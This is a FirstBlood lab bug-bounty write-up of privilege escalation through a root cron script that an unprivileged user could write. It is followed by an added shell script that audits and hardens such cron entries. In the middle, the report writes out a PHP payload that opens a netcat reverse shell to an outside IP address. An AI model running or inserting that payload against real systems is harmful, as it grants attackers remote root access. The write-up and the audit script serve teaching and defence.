FirstBlood-#806 — Privilege escalation when having root
This issue was discovered on FirstBlood v2
On 2021-10-28, twsec Level 2 reported:
From deserialization, we can get an RCE, but we're not root on the machine. This report explains how I was able to do that.
1. With the RCE I'm the user fb-exec
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635452591/hhy9ljy2zawxqaeovwr3.jpg)
I made a few Google searches on Linux privilege escalation cheat sheets, and they talk about cron jobs,
so we try to find what kind of cron jobs we have.
2. List the cron jobs
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635452695/bb65pvfochxmgqxkjvcs.jpg)
firstblood and php are of interest.
We cat firstblood and find the following:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453121/scgwzx3ryksxhgmj9cbu.jpg)
php scheduler.php is of interest. Now we need to find scheduler.php:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453211/gcoh3fyvtqotvicicwqx.jpg)
ls -al to see the permissions on this file:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453261/dzmpatjqyqltg2x42h8r.jpg)
and we see write access, but first let's see its contents:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453340/bimmdypzqonhjaigfzra.jpg)
This file belongs to root, but fb-exec can write to it, so we prepare our payload:
printf "<?php system('nc 52.14.6.200 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php
This command overwrites scheduler.php:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453463/zuatbeho8jfjhrcklci7.jpg)
and this is what it contains now.
Now on our server we have to listen on that port and wait.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453726/qle3dhxbuyjmrup47x0l.jpg)
Once we get our connection, we check who we are, and we're root.
P1 CRITICAL
Endpoint: api/checkproof.php
Parameter: proof
Payload: phar file
FirstBlood ID: 35
Vulnerability Type: RCE
A cron job is set to execute the file /app/firstblood/scheduler.php every minute as the root user. This file is writable by the firstblood PHP pool user (fb-exec), so the RCE from the [checkproof bug] can be combined with it to obtain root privileges. The fix is to have the script owned by root and not writable by fb-exec (or any other unprivileged account), since anything cron runs as root must only be modifiable by root.
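As an added example (not part of twsec's report or of the FirstBlood code), the following POSIX shell audit flags the misconfiguration described above: a cron entry run as root whose script a low-privilege account such as fb-exec could rewrite. It assumes the /etc/cron.d layout (five time fields, a user field, then the command); the cron file path and the account name are whatever you pass in.

```shell
#!/bin/sh
# Added example, not part of the original report or of the FirstBlood code:
# audit a cron file for entries that run as root but execute a script that a
# low-privilege account can rewrite, the condition exploited in the report.
# Assumptions: /etc/cron.d layout (five time fields, user, command); the
# account is checked by name, so it need not exist on the auditing host.

# file_perms <path>: print "<mode> <owner> <group>" parsed from ls -l, which
# is portable (GNU and BSD stat take different option syntax).
file_perms() {
    ls -ld "$1" | awk '{ print $1, $3, $4 }'
}

# user_can_write <path> <user>: return 0 if the account could modify the
# file through the world, owner, or group write bit; 1 otherwise.
user_can_write() {
    set -- "$2" $(file_perms "$1")
    user=$1 mode=$2 owner=$3 group=$4
    # other-write bit (position 9 of the mode string, e.g. -rw-rw-rw-)
    case $mode in ????????w*) return 0 ;; esac
    # owner-write bit (position 3) and the account owns the file
    case $mode in ??w*) if [ "$owner" = "$user" ]; then return 0; fi ;; esac
    # group-write bit (position 6) and the account is a member of that group
    case $mode in
        ?????w*)
            for g in $(id -Gn "$user" 2>/dev/null); do
                if [ "$g" = "$group" ]; then return 0; fi
            done ;;
    esac
    return 1
}

# audit_cron <cron_file> <user>: for every entry run as root, print
# "<first schedule field> <script>" for each absolute path in the command
# that the account could rewrite. No output means nothing was found.
audit_cron() {
    cron_file=$1 user=$2
    # skip comments, blank lines and VAR=value assignments
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$cron_file" |
    while read -r min hour dom mon dow cuser cmd; do
        if [ "${min#@}" != "$min" ]; then
            # @reboot/@daily style entry: the user is the second field
            set -- $hour $dom $mon $dow $cuser $cmd
            cuser=$1
            if [ $# -gt 0 ]; then shift; fi
            cmd=$*
        fi
        [ "$cuser" = root ] || continue
        set -f   # do not glob-expand tokens such as /tmp/*
        for tok in $cmd; do
            case $tok in /*) ;; *) continue ;; esac
            [ -f "$tok" ] || continue
            if user_can_write "$tok" "$user"; then
                printf '%s %s\n' "$min" "$tok"
            fi
        done
        set +f
    done
    return 0
}

# harden_script <path>: strip the group and world write bits so only the
# owner (root, for a root cron job) can change what cron will execute.
harden_script() {
    chmod go-w "$1"
}

# usage: audit_cron /etc/cron.d/firstblood fb-exec
```

Run it as `audit_cron /etc/cron.d/firstblood fb-exec`; on the vulnerable box it prints the `* /app/firstblood/scheduler.php` line, and prints nothing once `harden_script` has been applied and the file is owned by root. Two caveats: `harden_script` only removes write bits, so a file still owned by fb-exec must also be `chown`ed to root, and the audit checks the script's own mode only; a writable parent directory (which lets the attacker rename a replacement into place) or a writable interpreter such as the `php` binary on the entry's `PATH` would need a separate check.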